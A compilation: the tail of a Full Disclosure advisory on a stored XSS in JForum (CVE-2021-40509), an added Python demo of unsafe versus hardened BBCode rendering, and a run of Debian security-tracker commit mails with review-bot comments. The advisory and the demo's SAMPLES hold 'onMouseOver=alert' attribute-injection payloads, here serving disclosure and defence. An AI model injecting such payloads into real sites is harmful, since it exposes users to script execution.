> Renders into HTML:
> http://www.demo.com; onmouseover="alert('xss')"
> target="_blank">test
> 
> through analysis, the forum has set the cookie to http-only, but the
> attacker can use the $.getScript to do some evil things.
> 
> this vulnerability has been fixed in
> https://sourceforge.net/p/jforum2/code/934/ .
> 
> timeline:
> 2021-04-21 announce the developer of Jforum by e-mail
> 2021-04-22 Jforum fixed the vulnerability, and will include this fix in
> next release
> 2021-09-02 send this mail to bugtraq

CVE-2021-40509 has been assigned for this vulnerability.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40509

-- 
Henri Salo

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
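
The attribute injection described in the quoted report, as an added example that is not part of the original message and is not JForum's code: a minimal regex BBCode renderer (an assumed failure model; `render_unsafe`, `render_safe`, `url_ok` and `event_handler_attrs` are hypothetical names) beside a hardened form, with the output parsed to list any `on*` attributes. The sample inputs are constructed in the shape of the report's color, img and url forms, and the `<font>` output element is an assumption.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed inputs in the shape of the color/img/url forms quoted in the report.
SAMPLES = [
    "[color=red\" onMouseOver=\"alert('xss')]XSS[/color]",
    "[img]/demo.jpg\" onMouseOver=\"alert('xss')[/img]",
    "[url=http://www.demo.com\" onMouseOver=\"alert('xss')]test[/url]",
]

COLOR_TAG = re.compile(r"\[color=(.+?)\](.*?)\[/color\]", re.S)
IMG_TAG = re.compile(r"\[img\](.+?)\[/img\]", re.S)
URL_TAG = re.compile(r"\[url=(.+?)\](.*?)\[/url\]", re.S)


def render_unsafe(text):
    """Assumed failure model: escape for element content only, then paste
    the tag argument into a quoted attribute unchanged."""
    text = html.escape(text, quote=False)  # < > & are handled, quotes are not
    text = COLOR_TAG.sub(r'<font color="\1">\2</font>', text)
    text = IMG_TAG.sub(r'<img src="\1">', text)
    text = URL_TAG.sub(r'<a href="\1" target="_blank">\2</a>', text)
    return text


COLOR_OK = re.compile(r"[A-Za-z]{1,20}|#[0-9A-Fa-f]{3}|#[0-9A-Fa-f]{6}")
# Quotes, whitespace, angle brackets, BBCode brackets, backslash, controls.
URL_BAD_CHARS = re.compile(r"[\s\"'<>\[\]\\\x00-\x1f]")
ALLOWED_SCHEMES = {"http", "https"}


def url_ok(url):
    """Accept absolute http(s) URLs and site-relative paths, nothing else."""
    if URL_BAD_CHARS.search(url):
        return False
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme:
        return parts.scheme.lower() in ALLOWED_SCHEMES and bool(parts.netloc)
    return url.startswith("/") and not url.startswith("//")


def render_safe(text):
    """Escape for attribute context first, then emit a tag only when its
    argument passes an allowlist; otherwise the BBCode stays inert text."""
    text = html.escape(text, quote=True)

    def color(m):
        value = html.unescape(m.group(1))
        if not COLOR_OK.fullmatch(value):
            return m.group(0)
        # value is letters or #hex only, so it needs no further escaping
        return '<font color="%s">%s</font>' % (value, m.group(2))

    def img(m):
        url = html.unescape(m.group(1))
        if not url_ok(url):
            return m.group(0)
        return '<img src="%s">' % html.escape(url, quote=True)

    def link(m):
        url = html.unescape(m.group(1))
        if not url_ok(url):
            return m.group(0)
        return '<a href="%s" target="_blank" rel="noopener noreferrer">%s</a>' % (
            html.escape(url, quote=True), m.group(2))

    text = COLOR_TAG.sub(color, text)
    text = IMG_TAG.sub(img, text)
    text = URL_TAG.sub(link, text)
    return text


class _AttrCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.seen = []

    def handle_starttag(self, tag, attrs):
        self.seen.extend((tag, name) for name, _ in attrs)


def event_handler_attrs(markup):
    """Return (tag, attribute) pairs for every on* attribute in markup."""
    parser = _AttrCollector()
    parser.feed(markup)
    parser.close()
    return [(tag, name) for tag, name in parser.seen if name.startswith("on")]


if __name__ == "__main__":
    for sample in SAMPLES:
        print("input :", sample)
        print("unsafe:", event_handler_attrs(render_unsafe(sample)))
        print("safe  :", event_handler_attrs(render_safe(sample)))
```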


[Git][security-tracker-team/security-tracker][master] Typo fix

2021-08-31 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
b9d501b4 by Henri Salo at 2021-08-31T23:16:36+03:00
Typo fix

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -43540,17 +43540,17 @@ CVE-2021-22029
 CVE-2021-22028
RESERVED
 CVE-2021-22027 (The vRealize Operations Manager API (8.x prior to 8.5) 
contains a Serv ...)
-   NOT-FOR-US: Vmware
+   NOT-FOR-US: VMware
 CVE-2021-22026 (The vRealize Operations Manager API (8.x prior to 8.5) 
contains a Serv ...)
-   NOT-FOR-US: Vmware
+   NOT-FOR-US: VMware
 CVE-2021-22025 (The vRealize Operations Manager API (8.x prior to 8.5) 
contains a brok ...)
-   NOT-FOR-US: Vmware
+   NOT-FOR-US: VMware
 CVE-2021-22024 (The vRealize Operations Manager API (8.x prior to 8.5) 
contains an arb ...)
-   NOT-FOR-US: Vmware
+   NOT-FOR-US: VMware
 CVE-2021-22023 (The vRealize Operations Manager API (8.x prior to 8.5) has 
insecure ob ...)
-   NOT-FOR-US: Vmware
+   NOT-FOR-US: VMware
 CVE-2021-22022 (The vRealize Operations Manager API (8.x prior to 8.5) 
contains an arb ...)
-   NOT-FOR-US: Vmware
+   NOT-FOR-US: VMware
 CVE-2021-22021 (VMware vRealize Log Insight (8.x prior to 8.4) contains a 
Cross Site S ...)
NOT-FOR-US: VMware
 CVE-2021-22020
@@ -116134,13 +116134,13 @@ CVE-2020-5430
 CVE-2020-5429
REJECTED
 CVE-2020-5428 (In applications using Spring Cloud Task 2.2.4.RELEASE and 
below, may b ...)
-   NOT-FOR-US: Vmware
+   NOT-FOR-US: VMware
 CVE-2020-5427 (In Spring Cloud Data Flow, versions 2.6.x prior to 2.6.5, 
versions 2.5 ...)
-   NOT-FOR-US: Vmware
+   NOT-FOR-US: VMware
 CVE-2020-5426 (Scheduler for TAS prior to version 1.4.0 was permitting 
plaintext tran ...)
-   NOT-FOR-US: Vmware
+   NOT-FOR-US: VMware
 CVE-2020-5425 (Single Sign-On for Vmware Tanzu all versions prior to 1.11.3 
,1.12.x v ...)
-   NOT-FOR-US: Vmware
+   NOT-FOR-US: VMware
 CVE-2020-5424
REJECTED
 CVE-2020-5423 (CAPI (Cloud Controller) versions prior to 1.101.0 are 
vulnerable to a  ...)
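Review bot: On CVE-2020-5428, CVE-2020-5427 and CVE-2020-5426 the corrected string is still only the vendor, `VMware`, while the descriptions name Spring Cloud Task, Spring Cloud Data Flow and Scheduler for TAS. Since the lines are being touched anyway, naming the product would make a grep for the affected software useful.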
@@ -414475,7 +414475,7 @@ CVE-2011-3869 (Puppet 2.7.x before 2.7.5, 2.6.x 
before 2.6.11, and 0.25.x allows
{DSA-2314-1}
- puppet 2.7.3-3
 CVE-2011-3868 (Buffer overflow in VMware Workstation 7.x before 7.1.5, VMware 
Player  ...)
-   NOT-FOR-US: Vmware
+   NOT-FOR-US: VMware
 CVE-2011-3867
REJECTED
 CVE-2011-3866 (Mozilla Firefox before 7.0 and SeaMonkey before 2.4 do not 
properly re ...)
@@ -463779,7 +463779,7 @@ CVE-2008-2098 (Heap-based buffer overflow in the 
VMware Host Guest File System (
NOTE: vmware-package just builds vmware from downloaded tarballs, the 
package itself
NOTE: does not download them, however it needs to update its hashes for 
upstream tarballs
 CVE-2008-2097 (Buffer overflow in the openwsman management service in VMware 
ESXi 3.5 ...)
-   NOT-FOR-US: Vmware ESX/i
+   NOT-FOR-US: VMware ESX/i
 CVE-2008-2096 (SQL injection vulnerability in BackLinkSpider allows remote 
attackers  ...)
NOT-FOR-US: BackLinkSpider
 CVE-2008-2095 (SQL injection vulnerability in index.php in the FlippingBook 
(com_flip ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/b9d501b4589bd0d9b29be1313ae3e51fb6d8286c



[Git][security-tracker-team/security-tracker][master] NFU

2021-08-18 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
f892867d by Henri Salo at 2021-08-18T10:03:30+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -12789,6 +12789,7 @@ CVE-2021-33581
RESERVED
 CVE-2021-33580
RESERVED
+   NOT-FOR-US: Apache Roller
 CVE-2021-33586 (InspIRCd 3.8.0 through 3.9.x before 3.10.0 allows any user 
(able to co ...)
- inspircd 3.8.1-2 (bug #989144)
[buster] - inspircd  (Vulnerable code not present)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/f892867da16ef576b4d35f50293e9ee7f2a5e1b9



[Git][security-tracker-team/security-tracker][master] Unify product name

2021-08-14 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
5a78f2b2 by Henri Salo at 2021-08-14T11:47:42+03:00
Unify product name

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -77620,7 +77620,7 @@ CVE-2020-18465
 CVE-2020-18464 (Cross Site Request Forgery (CSRF) vulnerability in AikCms 
2.0.0 in vid ...)
NOT-FOR-US: AikCms
 CVE-2020-18463 (Cross Site Request Forgery (CSRF) vulnerability exists in 
v2.0.0 in vi ...)
-   NOT-FOR-US: aikcms
+   NOT-FOR-US: AikCms
 CVE-2020-18462 (File Upload vulnerabilty in AikCms v2.0.0 in poster_edit.php 
because t ...)
NOT-FOR-US: AikCms
 CVE-2020-18461



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/5a78f2b293247d8b8d0f513a31a901d1464317c0



[Git][security-tracker-team/security-tracker][master] NFU

2021-07-27 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
48874a43 by Henri Salo at 2021-07-27T23:22:24+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -93460,6 +93460,7 @@ CVE-2020-11511 (The LearnPress plugin before 3.2.6.9 
for WordPress allows remote
NOT-FOR-US: LearnPress plugin for WordPress
 CVE-2020-11510
RESERVED
+   NOT-FOR-US: LearnPress plugin for WordPress
 CVE-2020-11509 (An XSS vulnerability in the WP Lead Plus X plugin through 0.98 
for Wor ...)
NOT-FOR-US: WP Lead Plus X plugin for WordPress
 CVE-2020-11508 (An XSS vulnerability in the WP Lead Plus X plugin through 0.98 
for Wor ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/48874a43c7c7c75bbe1ca2083beb9933dc32e502



[Git][security-tracker-team/security-tracker][master] CVE-2021-33900/apacheds

2021-07-24 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
7adc1d9f by Henri Salo at 2021-07-24T12:54:54+03:00
CVE-2021-33900/apacheds

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -7840,6 +7840,9 @@ CVE-2021-33901
RESERVED
 CVE-2021-33900
RESERVED
+   - apacheds 
+   NOTE: https://www.openwall.com/lists/oss-security/2021/07/24/1
+   TODO: check
 CVE-2020-36384 (PageLayer before 1.3.5 allows reflected XSS via color 
settings. ...)
NOT-FOR-US: PageLayer
 CVE-2020-36383 (PageLayer before 1.3.5 allows reflected XSS via the font-size 
paramete ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/7adc1d9f04061be3f19169636c98efa1cb81f972



[Git][security-tracker-team/security-tracker][master] CVE-2021-32746, CVE-2021-32747/icinga2

2021-07-13 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
ca3732e7 by Henri Salo at 2021-07-13T21:14:03+03:00
CVE-2021-32746, CVE-2021-32747/icinga2

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -8943,9 +8943,11 @@ CVE-2021-32749
 CVE-2021-32748
RESERVED
 CVE-2021-32747 (Icinga Web 2 is an open source monitoring web interface, 
framework, an ...)
-   TODO: check
+   - icinga2 
+   NOTE: 
https://github.com/Icinga/icingaweb2/security/advisories/GHSA-2xv9-886q-p7xx
 CVE-2021-32746 (Icinga Web 2 is an open source monitoring web interface, 
framework and ...)
-   TODO: check
+   - icinga2 
+   NOTE: 
https://github.com/Icinga/icingaweb2/security/advisories/GHSA-cmgc-h4cx-3v43
 CVE-2021-32745
RESERVED
 CVE-2021-32744
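Review bot: The package line added for CVE-2021-32747 and CVE-2021-32746 is `- icinga2`, but both descriptions name Icinga Web 2 and both NOTE URLs point at the Icinga/icingaweb2 repository. Confirm the source package: if the web interface is packaged separately from the `icinga2` daemon, these entries belong to that package instead.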



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/ca3732e76942db10d59751a3802b80eca2fbdd23



[Git][security-tracker-team/security-tracker][master] NFU

2021-07-13 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
37842898 by Henri Salo at 2021-07-13T21:12:00+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -29250,13 +29250,13 @@ CVE-2021-2
 CVE-2021-24443
RESERVED
 CVE-2021-24442 (The Poll, Survey, Questionnaire and Voting system WordPress 
plugin bef ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24441 (The Sign-up Sheets WordPress plugin before 1.0.14 does not not 
sanitis ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24440 (The Sign-up Sheets WordPress plugin before 1.0.14 did not 
sanitise or  ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24439 (The Browser Screenshots WordPress plugin before 1.7.6 allowed 
authenti ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24438
RESERVED
 CVE-2021-24437
@@ -29266,7 +29266,7 @@ CVE-2021-24436
 CVE-2021-24435
RESERVED
 CVE-2021-24434 (The Glass WordPress plugin through 1.3.2 does not sanitise or 
escape i ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24433
RESERVED
 CVE-2021-24432
@@ -29276,29 +29276,29 @@ CVE-2021-24431
 CVE-2021-24430
RESERVED
 CVE-2021-24429 (The Salon booking system WordPress plugin before 6.3.1 does 
not proper ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24428
RESERVED
 CVE-2021-24427 (The W3 Total Cache WordPress plugin before 2.1.3 did not 
sanitise or e ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24426 (The Backup by 10Web  Backup and Restore Plugin 
WordPress plugin ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24425
RESERVED
 CVE-2021-24424 (The WP Reset  Most Advanced WordPress Reset Tool 
WordPress plug ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24423
RESERVED
 CVE-2021-24422
RESERVED
 CVE-2021-24421 (The WP JobSearch WordPress plugin before 1.7.4 did not 
sanitise or esc ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24420 (The Request a Quote WordPress plugin before 2.3.4 did not 
sanitise and ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24419 (The WP YouTube Lyte WordPress plugin before 1.7.16 did not 
sanitise or ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24418 (The Smooth Scroll Page Up/Down Buttons WordPress plugin 
through 1.4 do ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24417
RESERVED
 CVE-2021-24416
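Review bot: `NOT-FOR-US: Wordpress plugin` on these lines does not say which plugin, although each description names one (Salon booking system, W3 Total Cache, WP JobSearch and so on). Using the plugin name in the product string would let a later search for a specific plugin find its entries.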



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/37842898f539651e11f9ceb0c5143217c2633f50



[Git][security-tracker-team/security-tracker][master] NFU

2021-07-13 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
2f28e868 by Henri Salo at 2021-07-13T21:10:09+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -29316,9 +29316,9 @@ CVE-2021-24411
 CVE-2021-24410
RESERVED
 CVE-2021-24409 (The Prismatic WordPress plugin before 2.8 does not escape the 
'tab' GE ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24408 (The Prismatic WordPress plugin before 2.8 does not sanitise or 
validat ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24407 (The Jannah WordPress theme before 5.4.5 did not properly 
sanitize the  ...)
NOT-FOR-US: Wordpress theme
 CVE-2021-24406 (The wpForo Forum WordPress plugin before 1.9.7 did not 
validate the re ...)
@@ -29364,7 +29364,7 @@ CVE-2021-24387 (The WP Pro Real Estate 7 WordPress 
theme before 3.1.1 did not pr
 CVE-2021-24386 (The WP SVG images WordPress plugin before 3.4 did not sanitise 
the SVG ...)
NOT-FOR-US: Wordpress plugin
 CVE-2021-24385 (The Filebird Plugin 4.7.3 introduced a SQL injection 
vulnerability as  ...)
-   TODO: check
+   NOT-FOR-US: Wordpress plugin
 CVE-2021-24384 (The joomsport_md_load AJAX action of the JoomSport WordPress 
plugin be ...)
NOT-FOR-US: Wordpress plugin
 CVE-2021-24383 (The WP Google Maps WordPress plugin before 8.1.12 did not 
sanitise, va ...)
@@ -29404,7 +29404,7 @@ CVE-2021-24367 (The WP Config File Editor WordPress 
plugin through 1.7.1 was aff
 CVE-2021-24366 (The Admin Columns Free WordPress plugin before 4.3 and Admin 
Columns P ...)
NOT-FOR-US: WordPress plugin
 CVE-2021-24365 (The Admin Columns WordPress plugin Free before 4.3.2 and Pro 
before 5. ...)
-   TODO: check
+   NOT-FOR-US: WordPress plugin
 CVE-2021-24364 (The Jannah WordPress theme before 5.4.4 did not properly 
sanitize the  ...)
NOT-FOR-US: WordPress theme
 CVE-2021-24363
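Review bot: The line added for CVE-2021-24365 reads `WordPress plugin`, matching its neighbours, while the two earlier hunks of the same commit add `Wordpress plugin`. Settle on the `WordPress` spelling used in the CVE descriptions across the whole commit so that a single grep finds every entry.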



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/2f28e8686d632fbac264fcc38e2d5c161dd70e69



[Git][security-tracker-team/security-tracker][master] NFU

2021-07-13 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
83641477 by Henri Salo at 2021-07-13T21:03:49+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -34757,6 +34757,7 @@ CVE-2021-22001
RESERVED
 CVE-2021-22000
RESERVED
+   NOT-FOR-US: VMware
 CVE-2021-21999 (VMware Tools for Windows (11.x.y prior to 11.2.6), VMware 
Remote Conso ...)
NOT-FOR-US: VMware
 CVE-2021-21998 (VMware Carbon Black App Control 8.0, 8.1, 8.5 prior to 8.5.8, 
and 8.6  ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/836414771cd691a49426ebbdb2b5e93d4578642f



[Git][security-tracker-team/security-tracker][master] NFU

2021-07-13 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
d936dc25 by Henri Salo at 2021-07-13T21:03:09+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -34767,8 +34767,10 @@ CVE-2021-21996
RESERVED
 CVE-2021-21995
RESERVED
+   NOT-FOR-US: VMware
 CVE-2021-21994
RESERVED
+   NOT-FOR-US: VMware
 CVE-2021-21993
RESERVED
 CVE-2021-21992



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/d936dc25c1c5ad895311ef2e3e534f8058afe886



[Git][security-tracker-team/security-tracker][master] CVE-2021-36373, CVE-2021-36374/ant

2021-07-13 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
0d55e220 by Henri Salo at 2021-07-13T21:01:56+03:00
CVE-2021-36373, CVE-2021-36374/ant

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -726,8 +726,12 @@ CVE-2021-36375
RESERVED
 CVE-2021-36374
RESERVED
+   - ant 
+   NOTE: https://www.openwall.com/lists/oss-security/2021/07/13/6
 CVE-2021-36373
RESERVED
+   - ant 
+   NOTE: https://www.openwall.com/lists/oss-security/2021/07/13/5
 CVE-2021-36372
RESERVED
 CVE-2021-36371 (Emissary-Ingress (formerly Ambassador API Gateway) through 
1.13.9 allo ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/0d55e2203fd8a4810ddcf8c5da5881164f76cfc3



[Git][security-tracker-team/security-tracker][master] CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090

2021-07-13 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
8015d59e by Henri Salo at 2021-07-13T10:46:51+03:00
CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1310,6 +1310,8 @@ CVE-2021-3632
NOT-FOR-US: Keycloak
 CVE-2021-36090
RESERVED
+   - libcommons-compress-java 
+   NOTE: https://www.openwall.com/lists/oss-security/2021/07/13/4
 CVE-2020-36416 (A stored cross scripting (XSS) vulnerability in CMS Made 
Simple 2.2.14 ...)
NOT-FOR-US: CMS Made Simple
 CVE-2020-36415 (A stored cross scripting (XSS) vulnerability in CMS Made 
Simple 2.2.14 ...)
@@ -2640,10 +2642,16 @@ CVE-2021-35518
RESERVED
 CVE-2021-35517
RESERVED
+   - libcommons-compress-java 
+   NOTE: https://www.openwall.com/lists/oss-security/2021/07/13/3
 CVE-2021-35516
RESERVED
+   - libcommons-compress-java 
+   NOTE: https://www.openwall.com/lists/oss-security/2021/07/13/2
 CVE-2021-35515
RESERVED
+   - libcommons-compress-java 
+   NOTE: https://www.openwall.com/lists/oss-security/2021/07/13/1
 CVE-2021-35514 (Narou (aka Narou.rb) before 3.8.0 allows Ruby Code Injection 
via the t ...)
NOT-FOR-US: Narou
 CVE-2021-35513 (Mermaid before 8.11.0 allows XSS when the antiscript feature 
is used. ...)
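Review bot: All four entries in this commit get `- libcommons-compress-java`, yet the subject lists only the CVE ids. Appending `/libcommons-compress-java`, in the `CVE-.../package` form the neighbouring commits use, would make the log searchable by package.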



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/8015d59e114d9e9e59677fa98c3dddfe65b00ed2



[Git][security-tracker-team/security-tracker][master] CVE-2021-26920/druid

2021-07-01 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
36eba64a by Henri Salo at 2021-07-02T08:59:34+03:00
CVE-2021-26920/druid

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -21685,6 +21685,7 @@ CVE-2021-26921 (In util/session/sessionmanager.go in 
Argo CD before 1.8.4, token
NOT-FOR-US: Argo CD
 CVE-2021-26920
RESERVED
+   - druid  (bug #825797)
 CVE-2021-26919 (Apache Druid allows users to read data from other database 
systems usi ...)
- druid  (bug #825797)
 CVE-2021-26918 (** DISPUTED ** The ProBot bot through 2021-02-08 for Discord 
might all ...)
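Review bot: CVE-2021-26920 is `RESERVED` with no description, and the added `- druid` line reuses bug #825797 from CVE-2021-26919 without a NOTE showing where the druid attribution comes from. Add a `NOTE:` with the announcement URL so the entry can be verified while the CVE text is still unpublished.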



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/36eba64ae238fb4e7cf15389a424a20f053d8b9d



[Git][security-tracker-team/security-tracker][master] NFU

2021-06-15 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
e8ca41e5 by Henri Salo at 2021-06-16T08:04:48+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -91495,6 +91495,7 @@ CVE-2020-9494 (Apache Traffic Server 6.0.0 to 6.2.3, 
7.0.0 to 7.1.10, and 8.0.0
NOTE: https://github.com/apache/trafficserver/pull/6922
 CVE-2020-9493
RESERVED
+   NOT-FOR-US: Apache Chainsaw
 CVE-2020-9492 (In Apache Hadoop 3.2.0 to 3.2.1, 3.0.0-alpha1 to 3.1.3, and 
2.0.0-alph ...)
- hadoop  (bug #793644)
 CVE-2020-9491 (In Apache NiFi 1.2.0 to 1.11.4, the NiFi UI and API were 
protected by  ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/e8ca41e56c93d2f1110379460e1f1e04714e26c8



[Git][security-tracker-team/security-tracker][master] NFU

2021-05-29 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
a86f424b by Henri Salo at 2021-05-29T10:28:03+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -235,7 +235,7 @@ CVE-2021-33625
 CVE-2021-33624
RESERVED
 CVE-2021-33623 (The trim-newlines package before 3.0.1 and 4.x before 4.0.1 
for Node.j ...)
-   TODO: check
+   NOT-FOR-US: Node.js trim-newlines package
 CVE-2021-33622
RESERVED
 CVE-2021-33621
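
Review bot: Replacing "TODO: check" with "NOT-FOR-US: Node.js trim-newlines package" on CVE-2021-33623 needs a check that no Debian source package ships this module. Node.js modules are normally packaged under a "node-" prefix, so search the archive for that name before closing the entry as not-for-us.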



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/a86f424bfcd78ba832ac7e2795ce3e41dbd1245d



[Git][security-tracker-team/security-tracker][master] NFU

2021-05-04 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
4509e67f by Henri Salo at 2021-05-05T07:55:27+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -3087,6 +3087,10 @@ CVE-2021-30640
RESERVED
 CVE-2021-30639
RESERVED
+CVE-2020-36334
+   NOT-FOR-US: WordPress plugin themegrill-demo-importer
+CVE-2020-36333
+   NOT-FOR-US: WordPress plugin themegrill-demo-importer
 CVE-2020-36321 (Improper URL validation in development mode handler in 
com.vaadin:flow ...)
NOT-FOR-US: Vaadin
 CVE-2020-36320 (Unsafe validation RegEx in EmailValidator class in 
com.vaadin:vaadin-s ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/4509e67f7937e10079be4f1fe0452814dda02dae



[Git][security-tracker-team/security-tracker][master] Reverting commit as there was following error: 299286: error: bug name...

2021-04-07 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
09067bdc by Henri Salo at 2021-04-07T23:09:18+03:00
Reverting commit as there was following error: 299286: error: bug name 
TEMP-000-D41D8C is not unique

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1,6 +1,3 @@
-CVE-2021-
-   - mediawiki 
-   NOTE: 
https://lists.wikimedia.org/pipermail/mediawiki-announce/2021-April/000271.html
 CVE-2021-3484
RESERVED
 CVE-2021-3483
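
Review bot: The revert drops the whole entry, including the mediawiki NOTE, instead of fixing the cause of the error quoted in the commit message. The removed header is a bare "CVE-2021-" with no bracketed description, and D41D8C is how the MD5 of an empty string begins, so the temporary name was presumably derived from an empty description. Re-adding the entry with a "[...]" description on the header line should give it a unique name and keep the reference.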



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/09067bdc29f8ed3be1da1baf50654b79fa5bea98



[Git][security-tracker-team/security-tracker][master] MediaWiki security pre-release announcement: 1.31.13 / 1.35.2

2021-04-07 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
4f5b2fdf by Henri Salo at 2021-04-07T23:04:12+03:00
MediaWiki security pre-release announcement: 1.31.13 / 1.35.2

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1,3 +1,6 @@
+CVE-2021-
+   - mediawiki 
+   NOTE: 
https://lists.wikimedia.org/pipermail/mediawiki-announce/2021-April/000271.html
 CVE-2021-3484
RESERVED
 CVE-2021-3483
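
Review bot: The placeholder header "CVE-2021-" at the top of the hunk has no bracketed description, so nothing distinguishes it from any other entry without an assigned id. Put a short "[mediawiki: ...]" description on that line, and add a TODO to replace the placeholder once the ids from the pre-release announcement are assigned.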



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/4f5b2fdf5a90966326eeae5a7fb5793764e40dbb



[Git][security-tracker-team/security-tracker][master] CVE-2021-28918

2021-03-31 Thread Henri Salo


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
b7acc4f6 by Henri Salo at 2021-03-31T18:41:50+03:00
CVE-2021-28918

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1610,6 +1610,9 @@ CVE-2021-28919
RESERVED
 CVE-2021-28918
RESERVED
+   TODO: check
+   NOTE: https://sick.codes/sick-2021-011
+   NOTE: 
https://www.bleepingcomputer.com/news/security/critical-netmask-networking-bug-impacts-thousands-of-applications/
 CVE-2021-28917
